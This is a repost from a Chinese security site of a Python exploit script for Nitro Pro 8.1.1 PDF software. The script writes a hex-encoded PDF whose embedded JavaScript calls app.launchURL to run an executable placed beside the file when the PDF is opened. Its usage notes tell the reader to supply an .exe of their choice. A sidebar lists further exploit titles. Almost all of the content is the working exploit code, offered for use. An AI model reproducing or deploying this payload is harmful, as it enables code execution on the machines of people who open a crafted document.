Nitro Pro Remote Code Execution Exploit

		当前位置：主页>安全文章>文章资料>Exploits>文章内容

Nitro Pro Remote Code Execution Exploit

来源：vfocus.net 作者：Mr.XHat 发布时间：2014-01-29

#!\usr\bin\env python

# Exploit Title: Nitro Pro Remote Code Execution Exploit

# Date: 2013/03/15

# Exploit Author: Mr.XHat

# Discovered By: Mr.XHat

# Vendor Homepage: http://www.nitropdf.com/

# Software Link: http://www.rodfile.com/8178ciy92vu7

# Version: 8.1.1 Build 12

# Tested On: WinXP SP3 EN, Win7 SP1 EN

# How To Use: Put Your "*.exe" File Side The Exploit.pdf File.

Code = (

"\x25\x50\x44\x46\x2D\x31\x2E\x37\x0D\x25\xE2\xE3\xCF\xD3"+

"\x0D\x0A\x31\x20\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F"+

"\x54\x79\x70\x65\x20\x2F\x43\x61\x74\x61\x6C\x6F\x67\x0D"+

"\x0A\x2F\x4F\x75\x74\x6C\x69\x6E\x65\x73\x20\x35\x20\x30"+

"\x20\x52\x0D\x0A\x2F\x50\x61\x67\x65\x73\x20\x34\x20\x30"+

"\x20\x52\x0D\x0A\x2F\x41\x41\x20\x3C\x3C\x2F\x57\x43\x20"+

"\x3C\x3C\x2F\x53\x20\x2F\x4A\x61\x76\x61\x53\x63\x72\x69"+

"\x70\x74\x0D\x0A\x2F\x4A\x53\x20\x28\x78\x20\x3D\x20\x22"+

"\x50\x6f\x43\x2e\x65\x78\x65"+ # PoC.exe

"\x22\x3B\x20\x61\x70\x70\x2E\x6C\x61\x75\x6E\x63\x68\x55"+

"\x52\x4C\x5C\x28\x78\x2C\x20\x74\x72\x75\x65\x5C\x29\x3B"+

"\x29\x0D\x0A\x3E\x3E\x0D\x0A\x3E\x3E\x0D\x0A\x3E\x3E\x0D"+

"\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x32\x20\x30\x20\x6F"+

"\x62\x6A\x0D\x0A\x3C\x3C\x2F\x4D\x6F\x64\x44\x61\x74\x65"+

"\x20\x28\x44\x3A\x32\x30\x31\x33\x30\x33\x31\x35\x31\x32"+

"\x35\x31\x31\x30\x2B\x30\x34\x27\x33\x30\x27\x29\x0D\x0A"+

"\x2F\x43\x72\x65\x61\x74\x6F\x72\x20\x28\x4E\x69\x74\x72"+

"\x6F\x20\x50\x72\x6F\x20\x38\x29\x0D\x0A\x3E\x3E\x0D\x0A"+

"\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x33\x20\x30\x20\x6F\x62"+

"\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x20\x2F\x50\x61"+

"\x67\x65\x0D\x0A\x2F\x50\x61\x72\x65\x6E\x74\x20\x34\x20"+

"\x30\x20\x52\x0D\x0A\x2F\x4D\x65\x64\x69\x61\x42\x6F\x78"+

"\x20\x5B\x30\x2E\x30\x30\x30\x30\x20\x37\x39\x32\x2E\x30"+

"\x30\x30\x30\x20\x36\x31\x32\x2E\x30\x30\x30\x30\x20\x30"+

"\x2E\x30\x30\x30\x30\x5D\x0D\x0A\x3E\x3E\x0D\x0A\x65\x6E"+

"\x64\x6F\x62\x6A\x0D\x0A\x34\x20\x30\x20\x6F\x62\x6A\x0D"+

"\x0A\x3C\x3C\x2F\x54\x79\x70\x65\x20\x2F\x50\x61\x67\x65"+

"\x73\x0D\x0A\x2F\x43\x6F\x75\x6E\x74\x20\x31\x0D\x0A\x2F"+

"\x4B\x69\x64\x73\x20\x5B\x33\x20\x30\x20\x52\x5D\x0D\x0A"+

"\x3E\x3E\x0D\x0A\x65\x6E\x64\x6F\x62\x6A\x0D\x0A\x35\x20"+

"\x30\x20\x6F\x62\x6A\x0D\x0A\x3C\x3C\x2F\x54\x79\x70\x65"+

"\x20\x2F\x4F\x75\x74\x6C\x69\x6E\x65\x73\x0D\x0A\x2F\x43"+

"\x6F\x75\x6E\x74\x20\x30\x0D\x0A\x3E\x3E\x0D\x0A\x65\x6E"+

"\x64\x6F\x62\x6A\x0D\x0A\x78\x72\x65\x66\x0D\x0A\x30\x20"+

"\x36\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x20"+

"\x36\x35\x35\x33\x35\x20\x66\x0D\x0A\x30\x30\x30\x30\x30"+

"\x30\x30\x30\x31\x36\x20\x30\x30\x30\x30\x30\x20\x6E\x0D"+

"\x0A\x30\x30\x30\x30\x30\x30\x30\x31\x37\x36\x20\x30\x30"+

"\x30\x30\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30"+

"\x32\x35\x39\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x30"+

"\x30\x30\x30\x30\x30\x30\x33\x35\x35\x20\x30\x30\x30\x30"+

"\x30\x20\x6E\x0D\x0A\x30\x30\x30\x30\x30\x30\x30\x34\x31"+

"\x37\x20\x30\x30\x30\x30\x30\x20\x6E\x0D\x0A\x74\x72\x61"+

"\x69\x6C\x65\x72\x0D\x0A\x3C\x3C\x2F\x52\x6F\x6F\x74\x20"+

"\x31\x20\x30\x20\x52\x0D\x0A\x2F\x49\x6E\x66\x6F\x20\x32"+

"\x20\x30\x20\x52\x0D\x0A\x2F\x53\x69\x7A\x65\x20\x36\x0D"+

"\x0A\x3E\x3E\x0D\x0A\x73\x74\x61\x72\x74\x78\x72\x65\x66"+

"\x0D\x0A\x34\x36\x37\x0D\x0A\x25\x25\x45\x4F\x46\x0D\x0A"

)

try:

File = open("Exploit.pdf", "w")

File.write(Code)

File.close()

print "\nFile Created Successfully!"

except:

print "\nTry Again!"

# END

[

推荐] [

评论(0条)] [返回顶部] [打印本页] [关闭窗口]

匿名评论

评论内容：(不能超过250字，需审核后才会公布，请自觉遵守互联网相关政策法规。

§最新评论：

热点文章

·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1

推荐广告